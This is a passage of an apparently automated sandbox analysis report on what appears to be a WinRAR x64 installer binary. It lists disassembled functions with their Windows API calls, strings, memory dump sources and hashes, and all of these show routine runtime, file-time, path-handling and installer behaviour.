Instruction Fuzzy Hash: 6E41C229F1464286F3109F65D812FAD3760AB5EB9AF441130DDDE67B95CE3EE449CB00

Function 00007FF6C3BC0BF8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6C3BC0C38
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6C3BC1000
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6C3BC129F

Strings

f, xrefs: 00007FF6C3BC0E85
f, xrefs: 00007FF6C3BC0CD0
p, xrefs: 00007FF6C3BC0CDD
f, xrefs: 00007FF6C3BC0D3A
p, xrefs: 00007FF6C3BC0D42

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 3e37737b2b1630447d2a3105bac6e122366a1c5d0912d830ab69edb90e93f5d3
Instruction ID: 08779c234daf71f3429f92e103a0fc90dabac96e3933e6e2f6ec6a83b0be7b27
Opcode Fuzzy Hash: 3e37737b2b1630447d2a3105bac6e122366a1c5d0912d830ab69edb90e93f5d3
Instruction Fuzzy Hash: 19129371E0C24386FB30BE15B056AB976A1FBA2756F844135E6DDE66C4CF3CE9808B50

Function 00007FF6C3BBD17C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMONLIBRARYCODE

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6C3BBD1D9

Part of subcall function 00007FF6C3BBF474: __GetUnwindTryBlock.LIBCMT ref: 00007FF6C3BBF4B7
Part of subcall function 00007FF6C3BBF474: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6C3BBF4DC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6C3BBD2B1
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6C3BBD506
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6C3BBD612

Strings

csm, xrefs: 00007FF6C3BBD25A
csm, xrefs: 00007FF6C3BBD1F3
csm, xrefs: 00007FF6C3BBD2D4

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: bf35c164f4fc320906250694f78045419fc462ffd86672fcd34a9d4721b1bdcc
Instruction ID: 1c92d402c5c2855a26d82302ce78a1add344a9b9548648636c62fa2959844a77
Opcode Fuzzy Hash: bf35c164f4fc320906250694f78045419fc462ffd86672fcd34a9d4721b1bdcc
Instruction Fuzzy Hash: 29E18172A087418AEB649F65D482AAD77A0FB6679DF000139EECDAB755CF3CE480C740

Function 00007FF6C3BA00DC Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 247fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00007FF6C3BA0123
GetLongPathNameW.KERNEL32 ref: 00007FF6C3BA0163
GetShortPathNameW.KERNEL32 ref: 00007FF6C3BA0196
GetShortPathNameW.KERNEL32 ref: 00007FF6C3BA01D6
MoveFileW.KERNEL32 ref: 00007FF6C3BA0398
MoveFileW.KERNEL32 ref: 00007FF6C3BA03EF

Strings

rtmp, xrefs: 00007FF6C3BA02DB

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: NamePath$FileLongMoveShort
String ID: rtmp
API String ID: 3741477874-870060881
Opcode ID: 864bdc96c11d505100e4f4ee2dd4cf0369ce68428be1a13680a116c38f3d6fe5
Instruction ID: 64430e9687d6b2d3569597167ee8e7af87d5f1b86aea7b5e313f90ebc7738d5f
Opcode Fuzzy Hash: 864bdc96c11d505100e4f4ee2dd4cf0369ce68428be1a13680a116c38f3d6fe5
Instruction Fuzzy Hash: EEA12012E09A0255FA10EF61D4539FD6770AFF2795F404031E9CDEB6AAEE2CD94AC740

Function 00007FF6C3BB6E54 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 239COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 00007FF6C3BB70AE
GetExitCodeProcess.KERNEL32 ref: 00007FF6C3BB70E4
CloseHandle.KERNEL32 ref: 00007FF6C3BB710C
ShowWindow.USER32 ref: 00007FF6C3BB7166

Strings

.exe, xrefs: 00007FF6C3BB7117
Install, xrefs: 00007FF6C3BB6FF1
.inf, xrefs: 00007FF6C3BB6FE2

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ShowWindow$CloseCodeExitHandleProcess
String ID: .exe$.inf$Install
API String ID: 235082525-1844831949
Opcode ID: d8861afc4b9a202871ea97dc2f72c2079ecfc2f1bea4ddbe517bf783db686e3a
Instruction ID: 8a90872450e9f4e7f935261b4d4f1b94da0da5295e2c4728d9858a49ff821474
Opcode Fuzzy Hash: d8861afc4b9a202871ea97dc2f72c2079ecfc2f1bea4ddbe517bf783db686e3a
Instruction Fuzzy Hash: C9A18C11F0DB0645FB14EF619893ABD27B1AFB7786F405031D9CEEB696DE2CE9058240

Function 00007FF6C3BB5950 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

LICENSEDLG, xrefs: 00007FF6C3BB595F

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID: LICENSEDLG
API String ID: 0-2177901306
Opcode ID: 0c808f6cd05cc0a747108c0f82ff5e28cc2279d91e0e18d1e2e229003918714d
Instruction ID: 38549d06a7ae779c0409a884325250160ae6b923e3d88f3210fa92debbdd2516
Opcode Fuzzy Hash: 0c808f6cd05cc0a747108c0f82ff5e28cc2279d91e0e18d1e2e229003918714d
Instruction Fuzzy Hash: A031B528F0C74282FA549F15A992E782350AFABFD6F041031DDCEEBB95CE2DE5468701

Function 00007FF6C3BB213C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32 ref: 00007FF6C3BB217C
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00007FF6C3BB218E
SystemTimeToFileTime.KERNEL32 ref: 00007FF6C3BB219E
FileTimeToSystemTime.KERNEL32 ref: 00007FF6C3BB21AE
GetDateFormatW.KERNEL32 ref: 00007FF6C3BB21D4
GetTimeFormatW.KERNEL32 ref: 00007FF6C3BB2204

Strings

2, xrefs: 00007FF6C3BB21E2

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Time$System$File$Format$DateLocalSpecific
String ID: 2
API String ID: 909090443-450215437
Opcode ID: 4b14c85589888b76fbd4abfff1d50f03c115230c74de0e2e2410d8fb73203b99
Instruction ID: 1501ae940a23b0e51583b13db66113d9fb975dd73e8b505a28d97109211b9f2f
Opcode Fuzzy Hash: 4b14c85589888b76fbd4abfff1d50f03c115230c74de0e2e2410d8fb73203b99
Instruction Fuzzy Hash: 24318232A18B8696EB10DF60E841ADE73B1FBA9749F415132DACD97A58DF3CD109CB40

Function 00007FF6C3BB8FC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,SELECT * FROM Win32_OperatingSystem,?,00007FF6C3BA2E15,?,?,?,00007FF6C3BA2E4E), ref: 00007FF6C3BB9047
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,SELECT * FROM Win32_OperatingSystem,?,00007FF6C3BA2E15,?,?,?,00007FF6C3BA2E4E), ref: 00007FF6C3BB90C9
SysAllocString.OLEAUT32 ref: 00007FF6C3BB90D6

Strings

SELECT * FROM Win32_OperatingSystem, xrefs: 00007FF6C3BB8FC6

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID: SELECT * FROM Win32_OperatingSystem
API String ID: 262959230-522155302
Opcode ID: 5f571fdd453f642f9c47b9ffaa28006f8207e9096ed2591ccb07c40ec42f64f1
Instruction ID: cd2b0b204710ef09b719ef062ccc0c4824e0ab99dddfc67ab43852cd5a5a235b
Opcode Fuzzy Hash: 5f571fdd453f642f9c47b9ffaa28006f8207e9096ed2591ccb07c40ec42f64f1
Instruction Fuzzy Hash: 2F411731B0878685EB149F359482B787290EF66BAAF144634EAEDEB7D9CF3CD0418700

Function 00007FF6C3BB2BCC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetWindow.USER32 ref: 00007FF6C3BB2C0B
GetClassNameW.USER32 ref: 00007FF6C3BB2C38
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB2C73
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB2CC3
GetWindow.USER32 ref: 00007FF6C3BB2CDA

Strings

STATIC, xrefs: 00007FF6C3BB2C3E

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ButtonCheckedWindow$ClassName
String ID: STATIC
API String ID: 2214364856-1882779555
Opcode ID: 61700d33a8561694a78568dba75358c344a7c7a9c021a197164aa6a8e619da87
Instruction ID: e99867ca02bff762f0b6416b122e9098309617a142c24318bc05b5be5f1bb580
Opcode Fuzzy Hash: 61700d33a8561694a78568dba75358c344a7c7a9c021a197164aa6a8e619da87
Instruction Fuzzy Hash: E4310829B0CA4286EA249F15A492FB92351BFABBC6F001030CDCDAF755CE3DE4468B40

Function 00007FF6C3BC72E0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6C3BC72EF
FlsGetValue.KERNEL32 ref: 00007FF6C3BC7304
FlsSetValue.KERNEL32 ref: 00007FF6C3BC7325
FlsSetValue.KERNEL32 ref: 00007FF6C3BC7352
FlsSetValue.KERNEL32 ref: 00007FF6C3BC7363
FlsSetValue.KERNEL32 ref: 00007FF6C3BC7374
SetLastError.KERNEL32 ref: 00007FF6C3BC738F

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 33f8256a778b83c36d7b81987b11f071b38dbe2f901bfaba2eaf53f1a568370b
Instruction ID: 0eb24fb91e49bccae308b321ba441fab9b6a6910369f422a18ad4f5ec187fc8f
Opcode Fuzzy Hash: 33f8256a778b83c36d7b81987b11f071b38dbe2f901bfaba2eaf53f1a568370b
Instruction Fuzzy Hash: 9521BE20B0C24246FA34BF25764393D52525FA67B2F140675E9FEE66C6DE2CE5028240

Function 00007FF6C3BD13CC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6C3BD13FD
GetLastError.KERNEL32 ref: 00007FF6C3BD1409
CloseHandle.KERNEL32 ref: 00007FF6C3BD1421
CreateFileW.KERNEL32 ref: 00007FF6C3BD144C
WriteConsoleW.KERNEL32 ref: 00007FF6C3BD146B

Strings

CONOUT$, xrefs: 00007FF6C3BD142D

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 99401a05b28a9207d8dd0d05491b38b25e137ad6b948d1adcf7db3e2e0ec208d
Instruction ID: edfda1f2bdb0034c0b17817ad51b5179e9b15d8b9afcbd6dfbce5bea2314c40c
Opcode Fuzzy Hash: 99401a05b28a9207d8dd0d05491b38b25e137ad6b948d1adcf7db3e2e0ec208d
Instruction Fuzzy Hash: 2611B921B18B4186E3508F46F856725A7A0FBAAFE5F004234DADDD7798CF3CD5048784

Function 00007FF6C3BB8800 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF6C3BB876F,?,?,?,00007FF6C3BB8B2A), ref: 00007FF6C3BB8827
GetProcAddress.KERNEL32(?,?,?,00007FF6C3BB876F,?,?,?,00007FF6C3BB8B2A), ref: 00007FF6C3BB8844
GetProcAddress.KERNEL32(?,?,?,00007FF6C3BB876F,?,?,?,00007FF6C3BB8B2A), ref: 00007FF6C3BB8860

Strings

AcquireSRWLockExclusive, xrefs: 00007FF6C3BB883A
KERNEL32.DLL, xrefs: 00007FF6C3BB8820
ReleaseSRWLockExclusive, xrefs: 00007FF6C3BB884F

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 7c169681784771b86197f8841d22ea9abd0677e23566ea11e573b1539fb58786
Instruction ID: 23a969b2361a3d787995d5595a5b06a9c79df5ae8fb73ab012ea4790cdfd745f
Opcode Fuzzy Hash: 7c169681784771b86197f8841d22ea9abd0677e23566ea11e573b1539fb58786
Instruction Fuzzy Hash: EF115E20E0DB4382FE518F05BD82A7463916F36B8BF495434C9DDEA354EE3CE4458340

Function 00007FF6C3BAB444 Relevance: 9.1, APIs: 6, Instructions: 110timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6C3BA2A74: GetVersionExW.KERNEL32 ref: 00007FF6C3BA2AA5

FileTimeToLocalFileTime.KERNEL32 ref: 00007FF6C3BAB487
FileTimeToSystemTime.KERNEL32 ref: 00007FF6C3BAB493
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00007FF6C3BAB4A3
SystemTimeToFileTime.KERNEL32 ref: 00007FF6C3BAB4B1
SystemTimeToFileTime.KERNEL32 ref: 00007FF6C3BAB4BF
FileTimeToSystemTime.KERNEL32 ref: 00007FF6C3BAB500

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 785aab82d1612a79ecf9afd1edb4d9ea8d5d9007b697cc82a07f5d23ef14f703
Instruction ID: e326287b271b650c778dc2aa4228ce51e72207aeb20d4487310613e27b934200
Opcode Fuzzy Hash: 785aab82d1612a79ecf9afd1edb4d9ea8d5d9007b697cc82a07f5d23ef14f703
Instruction Fuzzy Hash: A1418072F146118AEB04CFB5D4529AC37B1FB18789B504036DE9EA7B58DF38D545C740

Function 00007FF6C3BAB5DC Relevance: 9.1, APIs: 6, Instructions: 83timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32 ref: 00007FF6C3BAB640

Part of subcall function 00007FF6C3BA2A74: GetVersionExW.KERNEL32 ref: 00007FF6C3BA2AA5

LocalFileTimeToFileTime.KERNEL32 ref: 00007FF6C3BAB662
FileTimeToSystemTime.KERNEL32 ref: 00007FF6C3BAB66E
TzSpecificLocalTimeToSystemTime.KERNEL32 ref: 00007FF6C3BAB67E
SystemTimeToFileTime.KERNEL32 ref: 00007FF6C3BAB68C
SystemTimeToFileTime.KERNEL32 ref: 00007FF6C3BAB69A

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 956c3446ac1bfcf25464c98837fee348a5ffcf07c062ffee1da10e396255a6cd
Instruction ID: dcab8f76408c5ffad321f1717257d98881b707e16b67fd3ab7d5d35706f6103f
Opcode Fuzzy Hash: 956c3446ac1bfcf25464c98837fee348a5ffcf07c062ffee1da10e396255a6cd
Instruction Fuzzy Hash: DF316B62F10A518AFB04CFB5E8815BC7370FF1974AB14503AEE9EA7A58EE38D485C340

Function 00007FF6C3BBD654 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 316COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6C3BBD7F2
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6C3BBDB15

Strings

csm, xrefs: 00007FF6C3BBD819
csm, xrefs: 00007FF6C3BBD79B
csm, xrefs: 00007FF6C3BBD739

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: b98dd5fb206b68b5eba08c546ad7e1a3d217a408265e6cb26d307de22595c447
Instruction ID: ef7dd5e525a3bb9123a08327742712d877714cac82387b4a5db79ba822bf429c
Opcode Fuzzy Hash: b98dd5fb206b68b5eba08c546ad7e1a3d217a408265e6cb26d307de22595c447
Instruction Fuzzy Hash: B7E1A0729086828AE760DF25D4C2BAD77A0FB6675DF140139DACDAB696CF3CE481C740

Function 00007FF6C3BA2B00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6C3BA2E24: SysFreeString.OLEAUT32 ref: 00007FF6C3BA2E81

VariantClear.OLEAUT32 ref: 00007FF6C3BA2CE3

Strings

SELECT * FROM Win32_OperatingSystem, xrefs: 00007FF6C3BA2BF0
WQL, xrefs: 00007FF6C3BA2C0C
Name, xrefs: 00007FF6C3BA2CBE
ROOT\CIMV2, xrefs: 00007FF6C3BA2B51

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ClearFreeStringVariant
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL
API String ID: 1438600931-566834514
Opcode ID: f3f7c93dd0b59fb0b52d163d98fb192c0b00dec4ab2310369f2350d2941d171a
Instruction ID: 2a4d7ce7aa3c9513754593f6a25f76a77dcbb043685fbb36daa213c188c20f8e
Opcode Fuzzy Hash: f3f7c93dd0b59fb0b52d163d98fb192c0b00dec4ab2310369f2350d2941d171a
Instruction Fuzzy Hash: 03714B36615F4685EB10DF25E8819AD73A4FB99B8AB404136EECE97B68CF3CE544C700

Function 00007FF6C3BBC478 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6C3BBC4A3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6C3BBC538
